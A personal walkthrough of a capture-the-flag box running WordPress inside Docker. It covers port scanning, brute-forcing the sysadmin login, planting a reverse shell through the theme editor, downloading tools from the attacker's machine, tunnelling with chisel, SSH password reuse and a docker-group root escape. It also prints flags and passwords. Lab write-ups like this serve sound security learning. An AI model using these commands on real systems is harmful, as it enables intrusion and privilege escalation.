Port scanning

sudo nmap --min-rate 10000 -p- 10.10.89.151        
[sudo] password for mikannse:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-07 03:20 UTC
Nmap scan report for 10.10.89.151
Host is up (0.26s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
2377/tcp closed swarm
7946/tcp closed unknown
sudo nmap -sT -sV -sC -O -p80 10.10.89.151             
[sudo] password for mikannse:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-07 03:21 UTC
Nmap scan report for 10.10.89.151
Host is up (0.26s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.4.2
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: MilkCo Test/POC site – Just another WordPress site
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose|storage-misc
Running (JUST GUESSING): Crestron 2-Series (86%), Linux 5.X (85%), HP embedded (85%)
OS CPE: cpe:/o:crestron:2_series cpe:/o:linux:linux_kernel:5.4 cpe:/h:hp:p2000_g3
Aggressive OS guesses: Crestron XPanel control system (86%), Linux 5.4 (85%), HP P2000 G3 NAS device (85%)
No exact OS matches for host (test conditions non-ideal).

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.22 seconds

Only port 80 is open. Note that 2377 and 7946 (Docker Swarm's cluster-management and node-communication ports) came back closed rather than filtered like the other 65531, which is an early hint that Docker is in play on this host.

Web

Visiting it shows a WordPress site, so start with a directory scan.

That turned up one user: sysadmin.

Run WPScan against it (the first command enumerates vulnerable plugins, vulnerable themes, timthumbs and users; the second brute-forces the login for sysadmin):

wpscan --url http://bus.thm/ --enumerate vp,vt,tt,u
wpscan --url http://bus.thm/wp-login.php -P /usr/share/wordlists/rockyou.txt -U sysadmin

The brute force gives the password milkshake (it was really slow).

Login works. To get a reverse shell I edited the theme's index.php in the editor under Appearance (Appearance > Theme Editor), replacing it with PHP that connects back to a listener on Kali, started the listener, and then browsed to the page, which gave a shell.

flag0 is in /var/www/html:

ya7ooShiivagaipi

Port forwarding

Oddly, this machine has no other users.

I have a hunch that we are inside a Docker container.
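A few quick checks that turn that hunch into evidence, as an added example (this is not code from the original writeup). The markers it looks for are the usual ones: the /.dockerenv file, a container-runtime path in PID 1's cgroup, and / being an overlay mount. The parsing helpers take their input as an argument so they can be exercised on constructed text; the cgroup v2 case (a bare "0::/") is deliberately treated as "no evidence", since v2 hides the runtime path.

```bash
#!/usr/bin/env bash
# Added example: "am I inside a Docker container?" checks.
# Not part of the original writeup; the marker paths are the common ones
# (/.dockerenv, /proc/1/cgroup, /proc/mounts) and may differ per host.

# cgroup_mentions_container TEXT: returns 0 if a cgroup listing in the
# /proc/1/cgroup format references a container runtime path, 1 otherwise.
# Under cgroup v2 a container often shows only "0::/", which matches nothing,
# so a miss here is not proof that we are on the host.
cgroup_mentions_container() {
  printf '%s\n' "$1" | grep -Eq '/(docker|lxc|kubepods|containerd)[/-]' && return 0
  return 1
}

# root_is_overlay TEXT: returns 0 if a mount table in the /proc/mounts format
# shows / mounted as overlay, which is how Docker's default storage driver
# (overlay2) presents a container's root filesystem.
root_is_overlay() {
  printf '%s\n' "$1" | awk '$2 == "/" && $3 == "overlay" { found = 1 } END { exit found ? 0 : 1 }'
}

# in_container: live check against the current machine. Prints every
# indicator it finds and returns 0 if there was at least one.
in_container() {
  hits=0
  if [ -f /.dockerenv ]; then
    echo "/.dockerenv exists"; hits=$((hits + 1))
  fi
  if [ -r /proc/1/cgroup ] && cgroup_mentions_container "$(cat /proc/1/cgroup)"; then
    echo "PID 1 cgroup path references a container runtime"; hits=$((hits + 1))
  fi
  if [ -r /proc/mounts ] && root_is_overlay "$(cat /proc/mounts)"; then
    echo "/ is an overlay mount"; hits=$((hits + 1))
  fi
  [ "$hits" -gt 0 ]
}

# Usage on the compromised WordPress host:
# in_container && echo "looks like a container" || echo "no container markers found"
```

Run it from the web shell; on this box the DB_HOST of "db" in wp-config.php and the 172.18.0.x address point the same way, so a positive result here is what you expect.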

Look at wp-config.php for sensitive information:

define( 'DB_NAME', 'wpdb');

/** MySQL database username */
define( 'DB_USER', 'wpdbuser');

/** MySQL database password */
define( 'DB_PASSWORD', 'Ceixahz5');

/** MySQL hostname */
define( 'DB_HOST', 'db');

Nothing reusable here, although DB_HOST being the hostname "db" rather than localhost means the database lives on a separate host, most likely another container on the same Docker network.

hostname -I shows the machine's internal IP:

172.18.0.4

Start a web server on Kali and pull over a 64-bit static nmap binary (uname -m shows whether the target is 32- or 64-bit). Note that the file is downloaded to /tmp, so change into that directory before making it executable:

cd /tmp
curl http://10.11.38.245/nmap64 -o /tmp/nmap64
chmod +x nmap64
./nmap64 -sn 172.18.0.0/24
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-10-07 08:49 UTC
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.18.0.1
Host is up (0.00043s latency).
Nmap scan report for 172.18.0.2
Host is up (0.00026s latency).
Nmap scan report for 172.18.0.3
Host is up (0.00020s latency).
Nmap scan report for 172.18.0.4
Host is up (0.00012s latency).

Four hosts are alive.

But when I tried to scan ports it did not work. Maybe the static binary does not support port scanning? I do not know why; I uploaded netcat too and still could not scan. In any case, testing by hand showed that 172.18.0.1 has port 22 open, so I need to forward that port to my machine and connect over SSH.
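Whatever stopped the uploaded nmap, the shell itself can do the "testing by hand" systematically: bash's /dev/tcp pseudo-device opens a TCP connection with plain redirection and needs no binary at all. The following sweep is an added example, not code from the original writeup; the subnet and port list are arguments and the values in the usage line are the ones found on this box. Each probe runs in a child bash under timeout so a filtered port cannot hang the loop.

```bash
#!/usr/bin/env bash
# Added example: TCP port sweep with /dev/tcp, no extra binaries needed.
# Not from the original writeup. Requires bash on the target (the /dev/tcp
# device is a bash feature); timeout is used when present.

# probe_port HOST PORT [TIMEOUT_SECONDS]: returns 0 if a TCP connect succeeds.
# In bash -c, $0 is the first extra argument and $1 the second. A failed
# redirection makes the non-interactive child exit non-zero.
probe_port() {
  host=$1; port=$2; tmo=${3:-1}
  if command -v timeout >/dev/null 2>&1; then
    timeout "$tmo" bash -c 'exec 3<>"/dev/tcp/$0/$1"' "$host" "$port" 2>/dev/null
  else
    bash -c 'exec 3<>"/dev/tcp/$0/$1"' "$host" "$port" 2>/dev/null
  fi
}

# sweep_ports HOST PORT...: prints "HOST:PORT open" for every reachable port.
# Always returns 0 so a host with nothing open does not abort a set -e caller.
sweep_ports() {
  h=$1; shift
  for p in "$@"; do
    probe_port "$h" "$p" && echo "$h:$p open"
  done
  return 0
}

# sweep_subnet PREFIX PORT...: walks PREFIX.1 through PREFIX.254 (a /24)
# and runs sweep_ports on each address.
sweep_subnet() {
  prefix=$1; shift
  i=1
  while [ "$i" -le 254 ]; do
    sweep_ports "$prefix.$i" "$@"
    i=$((i + 1))
  done
}

# Usage from the compromised WordPress container on this box:
# sweep_subnet 172.18.0 22 80 443 3306 2377 7946
```

Because this is a full connect per port it is slow on large ranges; keep the port list short (the services you expect in a compose stack: 22, 80, 3306, and the Swarm ports seen in the external scan) and widen it only for the hosts that answer.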

Use chisel.

On Kali:

./chisel server -p 2211 --reverse          

Kali acts as the server and the target acts as the client that connects back to it.

Upload chisel to the target, then start the client with a reverse forward so that port 8080 on Kali is tunnelled through the target to 172.18.0.1:22:

chmod +x chisel

./chisel client kaliip:2211 R:8080:172.18.0.1:22

Now connect from Kali. The room description hints at password reuse, so I tried the credentials obtained earlier and the login succeeded:

ssh -p 8080 sysadmin@localhost

flag1:

osh4loNi

Privilege escalation

id

We are in the docker group, which can almost certainly be used to escalate. The textbook case is the lxd group (LXD is the Linux container daemon used to manage LXD containers), but the docker group is abused the same way: either one lets you start a container with the host's filesystem mounted inside it, which is equivalent to root on the host.

Same approach as an earlier box: start a container from any image (any image with a shell will do; docker images lists what is available locally), mount the host's root directory inside it, and we are root. Here -v /:/mnt bind-mounts the host root at /mnt, --rm removes the container on exit, -it gives an interactive TTY, and chroot /mnt sh drops into a shell rooted in the host filesystem. Note that the process is still in the container's PID and network namespaces: you are root over the host's files (read /root/root.txt, add an SSH key, set a SUID shell), not root inside the host's process tree.

docker run -v /:/mnt --rm -it wordpress chroot /mnt sh

root.txt:

Kainiy1Onoonoh3j

Closing thoughts

A fairly easy box overall. Apart from the internal host discovery and the port forwarding, which may not be the first things that come to mind, the rest is familiar and straightforward.

If I remember right, this is the 50th box I have done, lol. It may look tedious to others, but I have learned a lot along the way and got to play plenty of really interesting machines. In short, thank you! I will keep going.